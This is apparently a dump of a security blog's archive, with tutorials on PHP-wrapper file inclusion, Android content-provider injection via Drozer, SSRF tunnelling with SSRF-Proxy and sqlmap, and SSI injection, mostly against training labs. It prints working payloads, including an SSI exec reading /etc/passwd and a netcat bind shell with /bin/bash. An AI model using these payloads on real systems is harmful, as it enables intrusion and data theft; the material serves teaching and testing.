36 | 
37 | <p>In certain cases, PHP Wrappers can be used to exploit this vulnerability to gain a remote shell. PHP Wrappers are streams that allow access to PHP interpreter’s input and output streams. The following PHP wrappers can be useful when probing for this vulnerability. </p>
38 | 
39 | 
40 | <p> Most common techniques of exploiting this vulnerability are
41 | <ul>
42 |   <li><b>expect://ls</b> : Executes a command on server. This function is not enabled by default</li>
43 |   <li><b>zip://</b> : Allows access to a file inside an archive with an arbitrary name.</li>
44 |    <li><b>data://text/plain;base64,[command encoded in base64]</b> : Executes a system command that can be encoded different content types. This can be useful when evading application firewalls.</li>
45 |    <li><b>php://input</b> : Allows data to be send to the target server. This can be used to get a reverse shell.</li>
46 |    <li><b>php://filter</b> : Can be used to read files from the server and encode it in different formats. This can be very useful when retrieving an exact copy of case sensitive files such as the application source code.</li>
47 | 
48 | 
49 | 
50 | <p>The above table is an example of common wrappers than can be used. Furthermore, it is also possible to use the <b>http://</b>, <b>ftp://</b> or <b>data://</b> URIs to retrieve different data files without knowing its physical location. This technique is more efficient than enumerating physical path of a target system file.</p>
51 | 
52 | <img alt="" src="http://snoopysecurity.github.io/img/lfi/lfi4.png" />
53 | 
54 | <p>The Apache server status file can be retrieved by using the <b>http://</b> URI. To gain a remote shell on the server, the <b>php://input</b> wrapper can be used. The <b>php://input</b> is a read-only stream that allows a server to read raw data from the request body.
55 | Note: This is technically a Remote file inclusion but I thought this would be an interesting read for newbies.
56 | </p>
57 | 
58 | <img alt="" src="http://snoopysecurity.github.io/img/lfi/lfi5.png" />
59 | 
60 | 
61 | <p>The above request will be processed by the server to download a malicious PHP script from an attacker controlled server. This is then saved in the var/www/ folder.  This can then be executed by browsing to the saved webpage and having a listener open for communications.</p>
62 | 
63 | <img alt="" src="http://snoopysecurity.github.io/img/lfi/lfi6.png" />
64 | 
65 | <p>To conclude, the use of PHP wrappers should always be tested when probing and fuzzing for file include vulnerabilities. Numerous fuzz payload repositories such as fuzzdb and Seclists do not contain any wrappers as part of their file inclusion fuzz payloads.</p>
66 | 
67 | <p> References : http://php.net/manual/en/wrappers.php </p>
68 | 


--------------------------------------------------------------------------------
/blog archive/2015-05-25-Content Provider Injection.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout:     post
  3 | title:      "Content Provider Injection"
  4 | subtitle:   "A small introduction to Content Provider Injection using Drozer"
  5 | date:       2015-03-12-01 12:00:00
  6 | author:     "Snoopy, the Security Dog"
  7 | header-img: "img/contact-bg.png"
  8 | ---
  9 | 
 10 | <h3>Introduction</h3>
 11 | 
 12 | <p>In Android applications, content providers are used to supply data to an application’s queries. Content providers can be used to access an application’s own data saved within a SQL Lite database or somewhere in the system. Content providers can be easily identified by looking for values with the ‘content://’ URI schema. </p>
 13 | 
 14 | 
 15 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp1.jpg" />
 16 | <p>The above illustration shows how different apps can access information through a content provider.</p>
 17 | <br>
 18 | <p>A Content provider of an application can centralize its contents in one location so many different applications access it as needed. In order to do this, an application will need to define its content provider in its manifest file. </p>
 19 | 
 20 | <blockquote>
 21 | &#x3C;provider
 22 | android:name=&#x22;com.test.example.DataProvider&#x22;
 23 | android:authorities =&#x22;com.test.example.DataProvider&#x22;&#x3E;
 24 | &#x3C;/provider&#x3E;
 25 | </blockquote>
 26 | 
 27 | <p> The above is an example of a content provider defined in the AndroidManifest.xml file. The AndroidManifest.xml file of an application can be viewed by decompiling the application using a tool such as apktool or Jadx.</p>
 28 | 
 29 | <h3>A working example</h3>
 30 | 
 31 | <p>Vulnerabilities can occur if the content provider of an application can be queried by other applications installed on the same system. This can lead to Content Provider Leakage, Traversal or Injection by exporting vulnerable content providers.
 32 | <br>
 33 | Exported content providers generally allow other applications on a device to request and share data. If sensitive information are accidentally leaked in one of these content providers, an attacker can query the vulnerable content provider to expose the sensitive data. 
 34 | <br>
 35 | To understand this flaw further, let’s analyse the Yahoo Weather application for Android. The Yahoo Weather application returns accurate weather forecasts based on a user's input and settings. This application uses a content provider to store all weather data which is exportable.
 36 | </p>
 37 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp2.png" />
 38 | 
 39 | <p>To identify all content providers used by the application, it is better to review the source code and the android manifest file. This is because applications sometimes can use custom defined permissions to protect a content provider. This means that the specified content provider cannot be queried by a malicious android app without having the same custom permission.  So by having custom permissions, developers believe that only system applications or applications with the same signature can access these permissions. But, this is still considered a vulnerability because a malicious developer can copy and extract the custom permission from a target application and recompile the malware to have the same permission. This is accept by the android system as a legit request and can give malware access to applications with custom defined permissions.
 40 | <br>
 41 | It should also be noted the more permission you give a malicious application, the more data it can access through exploiting content providers. But, the android permission model dictates that each application should have its own UID and GID. This means that even if a malicious application has all permissions, it can only access exported activities, providers or receivers. 
 42 | <br>
 43 | To search for all possible content providers defined in a java source, you can use a recursive ‘grep’.
 44 | </p>
 45 | 
 46 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp3.png" />
 47 | 
 48 | <p>The grep search will look at the entire content of the decompile code to find strings starting with the content URI schema.</p>
 49 | 
 50 | <h3>Technical Analysis</h3>
 51 | 
 52 | <p>To test the application for content provider leakage, it is best to fill the application with sample data and to better understand the attack surface. This can be done by adding different locations to the ‘Yahoo Weather Settings’ and setting a current location as any valid country.</p>
 53 | 
 54 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp4.png" />
 55 | 
 56 | <p>In order to take the role of a malicious application to attack the yahoo app, we can use Drozer. Drozer is a security assessment framework that can be used to emulate an android app. It can be used to discover and interact with any attack surfaces exposed by a target Android application.
 57 | <br>
 58 | After your Drozer setup is complete, you can query the application for any content providers that are exportable by using the below command.
 59 | </p>
 60 | 
 61 | <blockquote>dz> run app.provider.finduri [packagename]</blockquote>
 62 | 
 63 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp5.png" />
 64 | 
 65 | <p>In this example, the Drozer agent scanned the yahoo weather application and returned all exported content providers.  This is a useful function since only exported providers can be used by a malicious application.
 66 | 
 67 | Querying the <strong>content://com.yahoo.mobile.client.android.weather.provider.Weather/locations</strong> URI returns all weather forecast data stored by the application.  This is the data stored by the yahoo application depending on a user’s preference.
 68 | <br>
 69 | By looking at the returned data, it is possible for an attacker to identify the current location of a user.  This is because the 'isCurrentLocation' column has the value 1 or 0 depending on a user’s setting.  Furthermore, no permissions are needed for a malicious application to query the vulnerable content provider.
 70 | </p>
 71 | 
 72 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp6.png" />
 73 | 
 74 | <p>The above illustration is an example of data that is accessible to a possible attacker. 
 75 | 
 76 | If Drozer is able to query and show the data from the content provider, it means that the content provider is leaking data. This is because Drozer has not been explicitly granted any permission to use or query the data.
 77 | </p>
 78 | <br>
 79 | <p>This is cause for concern as any 3rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from this application. Furthermore, it is possible to inject data into any of the fields of the content provider making in vulnerable to Injection. This is not considered a high risk due to the nature of the data but it should still be taken under consideration.
 80 | In many cases, Client SQL Injection is possible if a content provider is using a SQLite database to store data. To test for SQL Injection through drozer, a user can try to do the following:
 81 | </p>
 82 | 
 83 | <blockquote> run app.provider.query content://fulluri/ --selection "1=1"</blockquote>
 84 | 
 85 | <p>This will try to inject a logical tautology into the SQL statement being parsed by the content provider and eventually the database query parser.  If the query returns all rows in the database, it means the application is vulnerable to SQL Injection. This is because “1=1” is a true statement and it returns all rows in the database due to the statement being always true.</p>
 86 | 
 87 | <p>Furthermore, Drozer can be used to quickly check for injection or content provider leakage vulnerabilities in any application. This can be done by using the default scanner modules.
 88 |  <li>scanner.provider.finduris </li>
 89 |  <li>scanner.provider.injection</li>
 90 | </p>
 91 | 
 92 | <h3>Remediation</h3>
 93 | 
 94 | <p>To fix this vulnerability, the android manifest file of the application should be amended to add ‘android:exported = false ’. Furthermore, a developer can add permissions which must be requested by another application before accessing the provider.
 95 | <br>
 96 | The below screenshot is a snippet of the Yahoo weather client’s manifest file. The manifest file defines that the weather provider can be exported. The application should be recompiled and signed with that value set to false to avoid content provider leakage.
 97 | 
 98 | </p>
 99 | 
100 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/contentp7.png" />
101 | <p>To fix against possible any SQL Injection, any use of the function ‘SQLiteDatabase.rawQuery()’ should be avoided. Any use of raw queries should be replaced by parameterised statements. But, it should be noted that there is no way for a user to exploit this particular SQL injection without accessing the content provider directly. This is due to all values being inserted by accessing an API, rather than a user.</p>
102 | 


--------------------------------------------------------------------------------
/blog archive/2015-05-25-Exploiting SSRF using SSRF-Proxy.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "Exploiting SSRF using SSRF-Proxy"
 4 | subtitle:   "A small introduction to SSRF using BWapp"
 5 | date:       2015-05-28-01 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/contact-bg.png"
 8 | ---
 9 | 
10 | <h3>Introduction</h3>
11 | 
12 | <p>Web Applications are often known to take user passed values and retrieves the contents of this value without any validation which can lead to known attacks such as SQL Injection, Local File Inclusion and more. But in rare cases, this can be exploited using an attack called Server Side Request Forgery. This is a short introduction to understanding Server Side Request Forgery and exploiting applications in the wild. </p>
13 | 
14 | <p>SSRF (also known as XPSA) usually occurs when a web application attempts to connect to user supplied URLs and does not validate backend responses received from the remote server. SSRF can be used by an attacker to port scan any internet facing servers and services by creating requests from the vulnerable server. Furthermore, this attack vector can be leveraged to turn the application server against its hosted infrastructure. </p>
15 | 
16 | <p> An attacker can leverage this vulnerability to conduct the following attacks:
17 | <ul>
18 |   <li>Port scanning the affected server's internal network.</li>
19 |   <li>Tunnel traffic through the vulnerable server and attack other external applications.</li>
20 |   <li>Attack services running on the application server or on the internal Intranet.</li>
21 |   <li>Denial of Service attacks on internal services.</li>
22 |   <li>Access local files available to the application by using different URI schemes such as ‘file://’.</li>
23 | </ul>
24 | </p>
25 | 
26 | <h3>A working Example</h3>
27 | 
28 | <p>To better understand an SSRF vulnerability, take a look at the following example from Bwapp. Bwapp is a vulnerable web application used for teaching purposes. The following URL takes a user parameter and retrieves the content back to the user.</p>
29 | 
30 | 
31 | <blockquote>http://192.168.0.28/bWAPP/rlfi.php?language=lang_en.php&action=go</blockquote>
32 | 
33 | <p>If you modify the 'language' parameter, it is obvious that the application is making outbound requests to other internet facing applications without any validation.
34 | 
35 | This vulnerability can be verified by forcing the application to perform outbound requests to a server you control.
36 | </p>
37 | 
38 | 
39 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/img1.png" />
40 | 
41 | <p>The vulnerable application is retrieving the contents of an external URL and returning its contents in its own response. 
42 | To exploit this vulnerability, an attacker can to conduct port scan on other servers by sending different requests with URI schemas and understanding error distinction given by the response. For example, an attacker can see if a port 22 of scanme.nmap.org is open by sending the following request.
43 | </p>
44 | 
45 | <blockquote>http://192.168.0.28/bWAPP/rlfi.php?language=http://scanme.nmap.org:22&action=go</blockquote>
46 | 
47 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/img2.png" />
48 | 
49 | <p>The server makes a request to scanme.nmap.org and returns the SSH header in the Bwapp application’s contents.
50 | 
51 | By enumerating through different ports, an attacker can distinguish if the port is open or not with error distinction. Furthermore, an attacker can start port scanning the local host and looking for internal services. This can be conducted manually or through fuzzers such as burp intruder or ZAP fuzzer. These types of attacks can usually bypass firewalls and web application firewalls since all traffic are proxied through the vulnerable application.
52 | 
53 | The automation of this vulnerability can be done through a tool called SSRF Proxy. SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF). Using SSRF Proxy, an attacker can use scanning tools such as sqlmap and nikto and tunnel traffic through the SSRF vulnerable servers.
54 | After setting up SSRF Proxy, the following command can be used to exploit a SSRF vulnerability and turn the target into a usable proxy.
55 | </p>
56 | 
57 | <blockquote>ssrf-proxy -u "http://192.168.0.28/bWAPP/rlfi.php?language=AttackURL&action=go" --cookie "security_level=0; PHPSESSID=20bb7b9881f9a5a8505665fa01f29320" --rules urlencode</blockquote>
58 | 
59 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/img3.png"/>
60 | 
61 | <p>SSRF Proxy will now setup a local proxy and forward any send traffic to the Bwapp application.
62 | 
63 | By attacking other hosts through the proxy, an attacker can remain anonymous while trying to exploit other hosts. Since SQL Injection requires numerous malicious payloads to be sent to a server, it is a good idea to proxy malicious SQL traffic through an SSRF Proxy.
64 | 
65 | You can now tunnel traffic through the proxy by using the '--proxy http://127.0.0.1:8081' in SQLmap.
66 | </p>
67 | 
68 | <blockquote>sqlmap.py --proxy http://127.0.0.1:8081 -u “http://examplesite.com/foo?parameter=*”</blockquote>
69 | 
70 | 
71 | <h3>Mitigations</h3>
72 | 
73 | <p>Server side validation should be implemented to check all received responses and only allow whitelisted resources. All user passed values should be validated and whitelisted to access only the needed resource
74 | Some applications will need functionality to send outbound requests. But, this should be restricted only to whitelisted resources. If possible, the application should not be allowed to make any external interaction on behalf of the user
75 | The below sample PHP code can be used to better understand how this vulnerability is introduced into a web application.
76 | </p>
77 | 
78 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/img4.png"/>
79 | 
80 | <p>The file_get contents PHP function is used to read a URL and send a HTTP POST request to the user passed URL without any validation. This can be exploited by a user to try a series of local IP addresses in order to determine what IP address range the internal server exist.
81 | In certain scenarios, hiding error messages cannot be considered as mitigation for this vulnerability.  This is because the attacker can find this vulnerability by trying to make an external request to an external server controlled by the attacker. This will lead to a blind SSRF vulnerability.
82 | </p>
83 | 
84 | 


--------------------------------------------------------------------------------
/blog archive/2015-08-25-ZAP-Scripting.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "ZAP Scripting"
 4 | subtitle:   "Useful for developers, functional testers and pentesters"
 5 | date:       2015-08-25 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/zapcover.png"
 8 | ---
 9 | 
10 | <p>Zed Attack Proxy (ZAP) is an open-source web application security scanner/proxy that can be used to find vulnerabilities. This blog post is about Zed Attack Proxy’s Scripting capabilities and how it can be very useful. </p>
11 | 
12 | <p>ZAP’s scripting feature allows a user to create a script in JavaScript or Zest to further improve ZAP Scanner capabilities.  A user can write numerous scripts to work with ZAP’s active scanning, passive scanning, proxy and more.  ZAP supports JavaScript and Zest scripts, but it also supports Jython and JRuby via the ZAP Marketplace.</p>
13 | 
14 | <img alt="" src="http://snoopysecurity.github.io/img/pic-11.png" style="width: 1689px; height: 367px;" />
15 | 
16 | <p>I don’t use ZAP a lot but I like the scripting feature due to how quick and easy it is. This can be useful if a user runs into a specific problem during a web application test and needs a quick fix through scripting. E.g. If a user wants the ZAP passive scanner to analyze and report all Base64 encoded data. This can be done by writing a ZAP script and enabling it on the script console.</p>
17 | 
18 | <p>Lastly, here is a repo of ZAP Scripts written by the community. I’ve written a couple as part of the ZAP Community Scripts Competition.</p>
19 | <p>ZAP Community Scripts Repo: <a href="https://github.com/zaproxy/community-scripts">Community Scripts</a></p>
20 | <p>ZAP Development Wiki: <a href="https://github.com/zaproxy/zaproxy/wiki/Development">ZAP Development</a></p>
21 | 


--------------------------------------------------------------------------------
/blog archive/2015-09-28-SSI-Injection.markdown:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "Server-Side Includes (SSI) Injection"
 4 | subtitle:   "Injecting SSI Directives into HTML pages to execute arbitrary code remotely."
 5 | date:       2015-09-28 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-03.jpg"
 8 | ---
 9 | 
10 | <p>SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.
11 | As an example, look at the below directive</p>
12 | <blockquote>&lt;!--#echo var=&quot;DATE_LOCAL&quot; --&gt;</blockquote>
13 | <p>When the page is served and rendered, the above directive will be evaluated to the current date used by the server.
14 | In most cases, the best ways to find these vulnerabilities are to look for the following page extensions</p>
15 | <li>.stm</li>
16 | <li>.shtm </li>
17 | <li>.shtml</li>
18 | <p>For example, when using Apache; SSI directives are set using </p>
19 | <blockquote>
20 | AddType text/html .shtml
21 | AddOutputFilter INCLUDES .shtml
22 | </blockquote>
23 | 
24 | 
25 | <p>But, it it also possible to use XBitHack directives to set any .html file extension to parse SSI directives. This can make the identification of the vulnerability much harder. Furthermore, the application should be invalidating special characters such as <strong>&lt; ! # = / . &quot; - &gt; and [a-zA-Z0-9]</strong> in order for successful exploitation. 
26 | Successful exploitation of this vulnerability can lead to system file access, as well as remote code execution. The best way to find an SSI Injection is by injecting any of the following payloads in any form fields or headers in a vulnerable application.</p>
27 | <blockquote>
28 | &lt;!--#echo var=&quot;DATE_LOCAL&quot; --&gt;  &nbsp;   <i>(prints current date)</i><br>
29 | &lt;!--#echo var=&quot;DOCUMENT_NAME&quot; --&gt;  &nbsp;   <i>(show current document filename)</i><br>
30 | &lt;!--#exec cmd=&quot;id&quot; --&gt;		&nbsp; <i>(execute ‘id’ command)</i><br>
31 | &lt;!--#exec cmd=&quot;cat /etc/passwd&quot; --&gt; &nbsp;   <i>(read passwd file)</i><br>
32 | &lt;!--#echo var=&quot;DOCUMENT_URI&quot; --&gt;  &nbsp; <i>(show virtual path and filename)</i>
33 | </blockquote>
34 | <p>For better understanding, let’s look at an SSI Injection example available on bWAPP. The below web page uses<strong> &lt;!--#echo var=&quot;REMOTE_ADDR&quot; --&gt;</strong> directive to print a user’s IP address. But, the application also takes two values and returns it in the result page without any validation. </p>
35 | 
36 | 
37 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/ssi1.png" />
38 | 
39 | <p>This can be exploited by using any of the above mentioned SSI payloads. I prefer using the ‘date local’ payload for initial detection since most web servers generally don't allow the use of the exec directive to execute system commands.</p>
40 | 
41 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/ssi2.png" />
42 | 
43 | <p>As expected, the current date and current document name is returned back in the page. This vulnerability can be further exploited by executing system commands to gain a remote shell.</p>
44 | <blockquote>&lt;!--#exec cmd=&quot;nc -lvp 4444 -e /bin/bash&quot; --&gt;</blockquote>
45 | 
46 | 
47 | <p>The above command starts a Netcat listener on port 4444. Netcat is a simple utility which reads and writes data across a network connection using TCP or UDP. If Netcat is running on the vulnerable server, you could use it to set up a listener and then redirect the output of operating system commands into the listener.
48 | Using Netcat, it is possible to get a remote shell on the server.</p>
49 | 
50 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/ssi3.png" />
51 | 
52 | <p>If you are using Burp Suite Pro, this vulnerability will be identified by the Burp scanner when using the active scan function.</p>
53 | 
54 | <img alt="" src="http://snoopysecurity.github.io/img/ssrf/ssi4.png" />
55 | 
56 | 
57 | 
58 | 
59 | 
60 | 


--------------------------------------------------------------------------------
/blog archive/2015-10-23-six-things-you-didnt-know-Drozer-could-do.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "6 things you didn't know Drozer could do"
 4 | subtitle:   "Some useful Drozer tricks"
 5 | date:       2015-10-23-01 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/burppost/drozer.png"
 8 | ---
 9 | 
10 | <h3>1 : Intent Sniffing</h3>
11 | 
12 | <p>Intent sniffing is an attack vector use to capture exposed intents.  In certain cases, applications will broadcast intents and will not define any permissions that in need to receive the intent.  This can then be captured by a malicious application.
13 | So passing sensitive data via Intents might potentially be dangerous. A popular tool used by most consultants (Link here:https://www.nccgroup.trust/us/about-us/resources/intent-sniffer/) called intent sniffer can be used. But it is possible to test for this vulnerability using Drozer.</p> 
14 | 
15 | <p>Drozer has a module called <blockquote>app.broadcast.sniff</blockquote> which can be used to sniff rogue intents. The below example is Drozer capturing all intents sent to battery changed receiver.
16 | </p>
17 | 
18 | <img alt="" src="http://snoopysecurity.github.io/img/burppost/sniff.png" />
19 | 
20 | 
21 | <h3>2 : Finding debuggable applications quickly</h3>
22 | 
23 | <p>If application is marked as debuggable, then a user can step through code, view variable values, and pause execution of an application. This can be very useful for an attacker since he can try to run arbitrary code under that application permission, hook into certain methods and modify set variables. </p>
24 | 
25 | <p> Drozer has a module called <blockquote>app.package.debuggable</blockquote> which can be used to find exploitable applications.  This simply looks for android:debuggable value in the AndroidManifest.xml but it is a more efficient way of searching for debuggable applications.</p>
26 | 
27 | <img alt="" src="http://snoopysecurity.github.io/img/burppost/sniff2.png" />
28 | 
29 | 
30 | <h3>3 :  Finding applications with backup enabled</h3>
31 | 
32 | <p>Android functionality allows backups and restoration of its data without having root permissions. This feature of android uses ADB backup that allows applications to be backed up to the cloud. This means that if a user replaces or wipes their phone, they can restore app settings. But if an attacker can get physical access to the device and take the backup of the app, he can modify the headers and restore it to the application’s original state.</p>
33 | <p>This is a low hanging vulnerability but it is still useful to find in applications. As always, the Drozer module run <blockquote>app.package.backup</blockquote> can be used to find applications with backup flag enabled in its manifest file.  
34 | </p>
35 | 
36 | <img alt="" src="http://snoopysecurity.github.io/img/burppost/sniff3.png"/>
37 | 
38 | 
39 | <h3>4 :  Capturing Clipboard content with Drozer</h3>
40 | 
41 | <p>All android mobile system has a clipboard which is used by all applications installed on the device. In certain scenarios, applications will store sensitive values such as passwords which can be read and altered by any application. More information about clipboard here: http://developer.android.com/reference/android/content/ClipboardManager.html</p>
42 | 
43 | <p>The drozer module post.capture.clipboard can be used to view clipboard content from any application. It should be noted that the clipboard module will need to be installed in Drozer first.</p>
44 | 
45 | 
46 | 
47 | <img alt="" src="http://snoopysecurity.github.io/img/burppost/sniff4.png" />
48 | 
49 | 
50 | <h3>5 :  AddJavaScriptInterface Arbitrary Code Execution</h3>
51 | 
52 | <p>The Add JavaScript Webview code execution is a vulnerability found in most applications. WebView supports usage of JavaScript which allows execution of remote code through a man in the middle attacker. <p>
53 | 
54 | <p>The Drozer module scanner.misc.checkjavascriptbridge can very useful when trying to identify the vulnerability.  By running the command <blockquote>run scanner.misc.checkjavascriptbridge</blockquote> it is possible to identify vulnerable applications</p>
55 | 
56 | 
57 | <img alt="" src="http://snoopysecurity.github.io/img/burppost/sniff5.png" />
58 | 
59 | 
60 | <h3>6 :  Rebuilding Drozer Agent with permissions</h3>
61 | 
62 | <p>By default, Drozer agent apk only comes with internet access permission. Sometimes you might have to rebuild Drozer agent with certain permissions for various tasks. e.g. Querying permission protected providers, testing custom permissions etc. <p>
63 | 
64 | <p> This can be done in command line by using<blockquote> Drozer agent build --permission android.permission.[PERMISSION YOU WANT]</blockquote> This is easier than decompiling the app, making edits to the manifest and recompiling again.</p>
65 | 
66 | 
67 | 
68 | <h3>Bonus :  Drozer built in scanning capabilities</h3>
69 | 
70 | <p> Other useful commands that are worth knowing
71 | <ul>
72 |   <li>scanner.provider.injection - Test content providers for SQL injection vulnerabilities.</li>
73 |   <li>scanner.provider.sqltables - Show all table names accessible through any SQL injection vulnerabilities.</li>
74 |   <li>scanner.provider.traversal - Test content providers for directory traversal.</li>
75 |   <li>scanner.misc.readablefiles & writablefiles - Find world-readable files and world-writable files in the given folder. This is easier than browsing each possible directories and using 'ls -la' to see permissions.</li>
76 |   <li>scanner.provider.finduris - Search for content providers that can be queried. </li>  
77 |  
78 | </p>
79 | 
80 | 
81 | 
82 | 


--------------------------------------------------------------------------------
/blog archive/2016-04-21-DVWS-Walkthrough_guide.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "DVWS Walkthrough Guide"
 4 | subtitle:   "Walkthrough guide for Damn Vulnerable Web Services"
 5 | date:       2016-04-21 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-04.jpg"
 8 | ---
 9 | <p>Damn Vulnerable Web Services is a vulnerable web application with multiple backend web services which can be used for learning about Web Service Security. The application contains a number of vulnerabilities including SQL Injection and Server Side Request Forgery.</p>
10 | <a href="https://github.com/snoopythesecuritydog/dvws">Damn Vulnerable Web Services</a>
11 | <p>I wrote this application a while back to practice my PHP Development skills. Since releasing the application, I did get a number of requests for a walkthrough guide. I finally got permission from my university to release the paper I wrote while designing the application. </p>
12 | <a href="/img/DVWS-_Understanding_Common_Web_Service_Vulnerabilies-V0.2.pdf">Walkthrough Guide</a>
13 | 
14 | 
15 | 
16 | <p>If you have any questions, feel free to reach out to me on twitter.</p>
17 | 
18 | <p>PS : I do have plans to add more updates to this project in the future so keep watching!</p>


--------------------------------------------------------------------------------
/blog archive/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/blog archive/3.png


--------------------------------------------------------------------------------
/blog archive/about.html:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: page
 3 | title: "About"
 4 | description: "Perfection is unattainable, therefore I seek perfection, so my journey is endless."
 5 | header-img: "img/about-bg.jpg"
 6 | ---
 7 | 
 8 | <h2>Who am I?</h2>
 9 | 
10 | <p>Some guy. I also bug hunt when I get the time.</p>
11 | 
12 | 
13 | 
14 | <h2>Projects</h2>
15 | 
16 | <p><a href="http://bsideslondon2014.sched.org/event-goers/ce30c456a7314da83e63cd2c9ab5e290">BSides London:Teaching Kids Programming and Cyber Security</a></p>
17 | <p><a href="https://github.com/snoopysecurity/dvws">Damn Vulnerable Web Services</a></p>
18 | 
19 | 
20 | <h2>Vulnerability Disclosures</h2>
21 | 
22 | <p><a href="http://research.magix.com">Magix AG Hall of Fame</a></p>
23 | <p><a href="https://www.checkpoint.com/about-us/white-hat/">Checkpoint Hall of Fame</a></p>
24 | <p><a href="https://psirt.bosch.com/en/acknowledgments.html">Bosch Hall of Fame</a></p>
25 | <p><a href="https://security.olx.com/security-hall-of-fame.html">OLX Hall of Fame</a></p>
26 | 


--------------------------------------------------------------------------------
/blog archive/contact.html:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: page
 3 | title: "Contact"
 4 | description: "Have questions? I have answers (maybe)."
 5 | header-img: "img/contact-bg.jpg"
 6 | ---
 7 | 
 8 | <p>Want to get in touch with me? Fill out the form below to send me a message and I will try to get back to you within 24 hours!</p>
 9 | <!-- Contact Form - Enter your email address on line 19 of the mail/contact_me.php file to make this form work. -->
10 | <!-- WARNING: Some web hosts do not allow emails to be sent through forms to common mail hosts like Gmail or Yahoo. It's recommended that you use a private domain email address! -->
11 | <!-- NOTE: To use the contact form, your site must be on a live web host with PHP! The form will not work locally! -->
12 | <form name="sentMessage" id="contactForm" novalidate>
13 |     <div class="row control-group">
14 |         <div class="form-group col-xs-12 floating-label-form-group controls">
15 |             <label>Name</label>
16 |             <input type="text" class="form-control" placeholder="Name" id="name" required data-validation-required-message="Please enter your name.">
17 |             <p class="help-block text-danger"></p>
18 |         </div>
19 |     </div>
20 |     <div class="row control-group">
21 |         <div class="form-group col-xs-12 floating-label-form-group controls">
22 |             <label>Email Address</label>
23 |             <input type="email" class="form-control" placeholder="Email Address" id="email" required data-validation-required-message="Please enter your email address.">
24 |             <p class="help-block text-danger"></p>
25 |         </div>
26 |     </div>
27 |     <div class="row control-group">
28 |         <div class="form-group col-xs-12 floating-label-form-group controls">
29 |             <label>Phone Number</label>
30 |             <input type="tel" class="form-control" placeholder="Phone Number" id="phone" required data-validation-required-message="Please enter your phone number.">
31 |             <p class="help-block text-danger"></p>
32 |         </div>
33 |     </div>
34 |     <div class="row control-group">
35 |         <div class="form-group col-xs-12 floating-label-form-group controls">
36 |             <label>Message</label>
37 |             <textarea rows="5" class="form-control" placeholder="Message" id="message" required data-validation-required-message="Please enter a message."></textarea>
38 |             <p class="help-block text-danger"></p>
39 |         </div>
40 |     </div>
41 |     <br>
42 |     <div id="success"></div>
43 |     <div class="row">
44 |         <div class="form-group col-xs-12">
45 |             <button type="submit" class="btn btn-default">Send</button>
46 |         </div>
47 |     </div>
48 | </form>
49 | 


--------------------------------------------------------------------------------
/blog archive/images/1.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/blog archive/images/1.JPG


--------------------------------------------------------------------------------
/blog archive/images/readme.md:
--------------------------------------------------------------------------------
1 | ### Images
2 | 


--------------------------------------------------------------------------------
/blog archive/index.html:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: page
 3 | description: "Hacking is the pursuit of knowledge, not wealth."
 4 | ---
 5 | 
 6 | {% for post in paginator.posts %}
 7 | <div class="post-preview">
 8 |     <a href="{{ post.url | prepend: site.baseurl }}">
 9 |         <h2 class="post-title">            {{ post.title }}
10 |         </h2>
11 |         {% if post.subtitle %}
12 |         <h3 class="post-subtitle">
13 |             {{ post.subtitle }}
14 |         </h3>
15 |         {% endif %}
16 |     </a>
17 |     <p class="post-meta">Posted by {% if post.author %}{{ post.author }}{% else %}{{ site.title }}{% endif %} on {{ post.date | date: "%B %-d, %Y" }}</p>
18 | </div>
19 | <hr>
20 | {% endfor %}
21 | 
22 | <!-- Pager -->
23 | {% if paginator.total_pages > 1 %}
24 | <ul class="pager">
25 |     {% if paginator.previous_page %}
26 |     <li class="previous">
27 |         <a href="{{ paginator.previous_page_path | prepend: site.baseurl | replace: '//', '/' }}">&larr; Newer Posts</a>
28 |     </li>
29 |     {% endif %}
30 |     {% if paginator.next_page %}
31 |     <li class="next">
32 |         <a href="{{ paginator.next_page_path | prepend: site.baseurl | replace: '//', '/' }}">Older Posts &rarr;</a>
33 |     </li>
34 |     {% endif %}
35 | </ul>
36 | {% endif %}
37 | 


--------------------------------------------------------------------------------
/cheatsheets/chrome.txt:
--------------------------------------------------------------------------------
 1 | chrome shortcuts
 2 | -----------------------
 3 | Ctrl+T	Opens a new tab.
 4 | Ctrl+U	View a web page's source code.
